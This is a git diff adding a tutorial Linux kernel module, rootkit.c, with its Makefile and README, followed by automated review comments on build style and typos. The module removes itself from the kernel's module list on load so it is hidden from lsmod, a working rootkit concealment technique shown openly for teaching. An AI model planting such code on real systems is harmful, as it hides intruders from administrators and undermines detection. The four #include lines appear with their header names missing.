diff --git a/3_RootkitTechniques/3.0_hiding_lkm/Makefile b/3_RootkitTechniques/3.0_hiding_lkm/Makefile
new file mode 100644
index 0000000..1856805
--- /dev/null
+++ b/3_RootkitTechniques/3.0_hiding_lkm/Makefile
@@ -0,0 +1,7 @@
+obj-m += rootkit.o
+
+all:
+ make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+
+clean:
+ make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
diff --git a/3_RootkitTechniques/3.0_hiding_lkm/README.md b/3_RootkitTechniques/3.0_hiding_lkm/README.md
new file mode 100644
index 0000000..34e0e39
--- /dev/null
+++ b/3_RootkitTechniques/3.0_hiding_lkm/README.md
@@ -0,0 +1,13 @@
+# Linux Kernel Hacking
+
+## 3.0: Hiding Kernel Modules
+
+Hide a kernel module after loading it
+
+To use:
+* Build with `make`
+* Load with `insmod rootkit.ko`
+* Check output in kernel buffer with `dmesg`
+* See that the module is missing from the output of `lsmod`
+
+> NOTE: Currently, you can't unload this kernel module without rebooting
diff --git a/3_RootkitTechniques/3.0_hiding_lkm/rootkit.c b/3_RootkitTechniques/3.0_hiding_lkm/rootkit.c
new file mode 100644
index 0000000..acc811f
--- /dev/null
+++ b/3_RootkitTechniques/3.0_hiding_lkm/rootkit.c
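Review bot: Both recipes in the Makefile hunk call `make` directly instead of `$(MAKE)`, so when this Makefile is driven by a parent make the jobserver and command-line flags are not propagated to the kernel build; use `$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules` and the matching form in `clean`. `$(PWD)` is taken from the environment and can be unset or stale depending on how make is invoked, whereas `$(CURDIR)` is set by make itself and is the safer choice for `M=`.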
@@ -0,0 +1,51 @@
+#include
+#include
+#include
+#include
+
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("TheXcellerator");
+MODULE_DESCRIPTION("Hiding LKMs");
+MODULE_VERSION("0.01");
+
+/* list_head is a doubly-linked list structure used by the kernel
+ * It's got a .prev and .next field, but we can use the list_del()
+ * and list_add() functions add/remove items from a list_head struct.
+ * The only thing to keep in mind is that we need to keep a local copy
+ * of the item that we remove so we can add it back later when we're done.
+ */
+static struct list_head *prev_module;
+static short hidden = 0;
+
+void showme(void)
+{
+ /* Add the saved list_head struct back to the module list */
+ list_add(&THIS_MODULE->list, prev_module);
+ hidden = 0;
+}
+
+void hideme(void)
+{
+ /* Save the module in the list before us, so we can add ourselves
+ * back to the list in the same place later. */
+ prev_module = THIS_MODULE->list.prev;
+ /* Remove ourselves from the list module list */
+ list_del(&THIS_MODULE->list);
+ hidden = 1;
+}
+
+static int __init rootkit_init(void)
+{
+ printk(KERN_INFO "Rootkit Loaded >:-)\n");
+ hideme();
+ return 0;
+}
+
+static void __exit rootkit_exit(void)
+{
+ /* Note that you won't be able to unload this LKM yet... */
+ printk(KERN_INFO "Goodbye, World!\n");
+}
+
+module_init(rootkit_init);
+module_exit(rootkit_exit);
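Review bot: `showme()` and `hideme()` are given external linkage although nothing outside this file uses them, and `showme()` is never called at all, so the kernel build will warn under `-Wmissing-prototypes` and `showme()` is dead code; declare both `static void showme(void)` / `static void hideme(void)`, and either remove the `hidden` flag, which is written in both functions but never read, or have `rootkit_exit()` consult it. The comment above the `list_del()` call reads "from the list module list"; it should be `/* Remove ourselves from the module list */`, and the block comment on `list_head` is missing a word in "functions add/remove items" ("functions to add/remove items"). As rendered in this hunk the four `#include` directives carry no header names, so the headers that declare `THIS_MODULE`, `list_add()`/`list_del()` and `printk()` cannot be checked here; worth confirming against the committed file.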